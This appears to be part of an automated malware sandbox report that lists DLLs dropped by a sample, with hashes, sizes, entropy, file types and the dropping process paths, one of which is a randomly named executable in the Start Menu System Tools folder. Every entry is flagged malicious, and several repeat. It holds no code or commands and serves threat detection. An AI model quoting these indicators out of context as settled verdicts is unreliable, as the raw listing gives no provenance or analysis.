                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
